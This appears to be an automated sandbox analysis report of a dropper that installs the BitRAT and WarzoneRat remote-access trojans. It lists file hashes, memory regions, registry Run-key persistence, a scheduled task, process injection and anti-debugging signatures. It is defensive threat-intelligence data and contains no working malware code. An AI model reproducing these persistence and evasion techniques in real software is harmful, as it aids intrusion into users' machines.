| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/568-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/1572-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/2008-92-0x0000000000000000-mapping.dmp
memory/1572-90-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/1792-96-0x0000000070CC0000-0x000000007126B000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/1560-78-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/2008-97-0x0000000000390000-0x0000000000412000-memory.dmp
memory/1472-98-0x0000000000000000-mapping.dmp
memory/1624-99-0x0000000000000000-mapping.dmp
memory/1472-100-0x000007FEFC311000-0x000007FEFC313000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/1580-103-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline
| MD5 | b3615aa7dcd23c3190e1bba2c2ce0e37 |
| SHA1 | 55cab252d83d2b86f7bde034877c00cf1d1552c3 |
| SHA256 | 1f7cfc1c1f36fb592b0e28711cf7d2b51474ec5d1ffe95df315d81c389b96d69 |
| SHA512 | 8d24b40da010554480eb7340f2e331ad2983fb4ed59dc9bb47b7c4033df80514388aebc4facce9847b6791dff711f147933552837a5228f7df5382a3590e6d03 |
\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.0.cs
| MD5 | b3a0e87506914a518a26de26cc397a0b |
| SHA1 | 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3 |
| SHA256 | 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110 |
| SHA512 | 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c |
memory/1792-106-0x0000000070CC0000-0x000000007126B000-memory.dmp
memory/1996-107-0x0000000070CC0000-0x000000007126B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp
| MD5 | 8d392b2e8c5a57c271da43346be3b755 |
| SHA1 | 364fad374140d78864c686f53295a0030481b557 |
| SHA256 | a55bab7f12f8282bbf044892f301fc29315f86246eee71d2eba2b286f9cc47a8 |
| SHA512 | e634d9254ae93b85dda6b7c450af802ba6e92a98c0c7eb5d96f232d1408010dacc37fddb4a44e99c80058ceba4f94b951d88451627175bd31c5cc0e13d13613d |
memory/1940-111-0x0000000000000000-mapping.dmp
memory/1476-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | 77dfcb6c2834e0bf0aedff8da1d1a0f9 |
| SHA1 | 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457 |
| SHA256 | f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d |
| SHA512 | aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c |
memory/2024-119-0x0000000000000000-mapping.dmp
memory/1276-118-0x0000000000130000-0x0000000000138000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | 77dfcb6c2834e0bf0aedff8da1d1a0f9 |
| SHA1 | 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457 |
| SHA256 | f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d |
| SHA512 | aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c |
memory/1276-115-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP
| MD5 | 1d5543c367c49b9dd6366270fdd4ee3a |
| SHA1 | bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66 |
| SHA256 | 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2 |
| SHA512 | 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04 |
memory/1348-108-0x0000000000000000-mapping.dmp
memory/1472-121-0x000007FEEBAF0000-0x000007FEEC513000-memory.dmp
memory/1472-123-0x0000000001374000-0x0000000001377000-memory.dmp
memory/1472-122-0x000007FEEEA20000-0x000007FEEF57D000-memory.dmp
memory/1472-124-0x000000000137B000-0x000000000139A000-memory.dmp
memory/1472-125-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1624-126-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1472-128-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1472-127-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1196-129-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-130-0x0000000140002300-mapping.dmp
memory/1196-132-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-133-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1196-134-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1196-135-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-136-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/416-137-0x0000000000830000-0x0000000000854000-memory.dmp
memory/416-140-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/460-149-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/416-142-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/416-147-0x0000000000830000-0x0000000000854000-memory.dmp
memory/1636-145-0x0000000000000000-mapping.dmp
memory/1028-146-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/2112-158-0x0000000000000000-mapping.dmp
\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/2144-159-0x0000000000400000-0x0000000000422000-memory.dmp
memory/476-153-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/1472-154-0x0000000001374000-0x0000000001377000-memory.dmp
memory/460-150-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/416-155-0x0000000000A00000-0x0000000000A2B000-memory.dmp
memory/1624-161-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/476-160-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/460-163-0x0000000000100000-0x000000000012B000-memory.dmp
memory/476-164-0x0000000000120000-0x000000000014B000-memory.dmp
memory/2144-166-0x0000000000402597-mapping.dmp
memory/2244-168-0x0000000000000000-mapping.dmp
memory/2144-170-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 11ba16e5ee0670ab6d6b482c52b7fdba |
| SHA1 | 5e530389d8005031f990e4dced5797f8cb9703b7 |
| SHA256 | f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b |
| SHA512 | b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81 |
memory/1472-173-0x000000000137B000-0x000000000139A000-memory.dmp
memory/1472-174-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1560-175-0x00000000003B0000-0x00000000003CB000-memory.dmp
memory/1472-176-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1560-180-0x00000000003B0000-0x00000000003CB000-memory.dmp
memory/1560-182-0x00000000003D0000-0x00000000003F0000-memory.dmp
memory/568-185-0x0000000002890000-0x00000000029EE000-memory.dmp
memory/2144-187-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2144-189-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/1636-192-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1572-196-0x0000000002880000-0x00000000028A0000-memory.dmp
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/1636-198-0x0000000004C20000-0x0000000004C40000-memory.dmp
memory/2112-199-0x0000000000090000-0x00000000000B0000-memory.dmp
memory/2144-200-0x0000000000140000-0x0000000000160000-memory.dmp
memory/1624-201-0x0000000000CE0000-0x000000000192A000-memory.dmp
memory/1624-202-0x00000000032E0000-0x0000000003300000-memory.dmp
memory/1624-203-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1196-204-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/416-205-0x0000000000A00000-0x0000000000A2B000-memory.dmp
memory/1636-197-0x0000000004F60000-0x00000000055B1000-memory.dmp
memory/1636-206-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1624-207-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/460-208-0x0000000000100000-0x000000000012B000-memory.dmp
memory/476-209-0x0000000000120000-0x000000000014B000-memory.dmp
memory/568-210-0x0000000002890000-0x00000000029EE000-memory.dmp
memory/484-212-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/484-237-0x0000000000360000-0x000000000038B000-memory.dmp
memory/484-240-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/576-243-0x0000000000430000-0x000000000045B000-memory.dmp
memory/576-246-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/652-252-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/652-249-0x0000000000520000-0x000000000054B000-memory.dmp
memory/744-257-0x0000000000A10000-0x0000000000A3B000-memory.dmp
memory/744-263-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/800-268-0x0000000000840000-0x000000000086B000-memory.dmp
memory/800-275-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/832-281-0x00000000008C0000-0x00000000008EB000-memory.dmp
memory/832-286-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/872-290-0x0000000000A40000-0x0000000000A6B000-memory.dmp
memory/296-296-0x0000000001B90000-0x0000000001BBB000-memory.dmp
memory/340-293-0x0000000000130000-0x000000000015B000-memory.dmp
memory/1168-306-0x0000000001E10000-0x0000000001E3B000-memory.dmp
memory/1168-307-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/1036-304-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/1036-300-0x00000000007A0000-0x00000000007CB000-memory.dmp
memory/1256-308-0x0000000001BB0000-0x0000000001BDB000-memory.dmp
memory/1340-310-0x0000000002780000-0x00000000027AB000-memory.dmp
memory/1256-309-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-12-15 13:24
Reported
2022-12-15 13:27
Platform
win10v2004-20220901-en
Max time kernel
27s
Max time network
130s
Command Line
Signatures
BitRAT
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| N/A | N/A | C:\ProgramData\$77images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name渀" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5036 set thread context of 2416 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4432 set thread context of 4260 | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GoogleUpdate.dll | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
